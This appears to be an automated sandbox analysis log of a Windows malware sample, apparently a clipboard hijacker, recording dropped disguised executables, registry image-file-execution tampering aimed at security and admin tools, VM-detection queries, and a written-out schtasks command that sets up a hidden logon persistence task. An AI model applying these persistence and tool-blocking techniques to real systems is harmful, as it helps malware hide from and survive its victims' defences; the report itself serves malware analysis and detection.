Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: pdh.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: propsys.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: amsi.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: userenv.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Section loaded: perfos.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static file information: File size 30441984 > 1048576
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1cad000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: .voltbl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: _RDATA
Source: SppExtComObj.exe.5.dr Static PE information: section name: .voltbl
Source: SppExtComObj.exe.5.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848E7D2A5 pushad ; iretd 12_2_00007FF848E7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9380D pushad ; iretd 12_2_00007FF848F93811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9846B push ebx; ret 12_2_00007FF848F9856A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9248D push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F900BD pushad ; iretd 12_2_00007FF848F900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F924ED push E95B6C93h; ret 12_2_00007FF848F92539
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Changes image file execution options
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9901 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep count: 9901 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655713768.00000245B0E99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical 